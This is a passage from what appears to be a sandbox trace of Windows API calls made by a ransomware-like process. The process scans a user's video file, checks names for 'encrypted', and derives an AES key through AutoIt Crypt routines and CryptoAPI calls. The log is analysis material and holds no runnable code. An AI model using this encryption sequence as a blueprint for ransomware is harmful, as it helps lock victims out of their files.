HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.395] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ahI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hI4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wsRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRei.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.396] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.396] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.396] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.396] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.396] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.396] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.396] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.396] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.396] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.396] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18dbab70, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x86f23e40, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0x86f23e40, ftLastWriteTime.dwHighDateTime=0x1d5be63, nFileSizeHigh=0x0, nFileSizeLow=0x165e8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="eahI4-2wsRei.mp4", cAlternateFileName="EAHI4-~1.MP4")) returned 0x7c2100 [0042.397] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.397] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.397] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.397] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.397] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.397] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.397] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.398] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0042.398] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.398] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.399] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.399] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.399] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.399] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.399] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.399] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.399] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.399] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.400] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.400] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.400] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.400] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.400] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.400] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.401] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.401] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.401] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.401] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.401] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.401] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.401] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.402] CryptDestroyHash (hHash=0x7c2240) returned 1 [0042.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 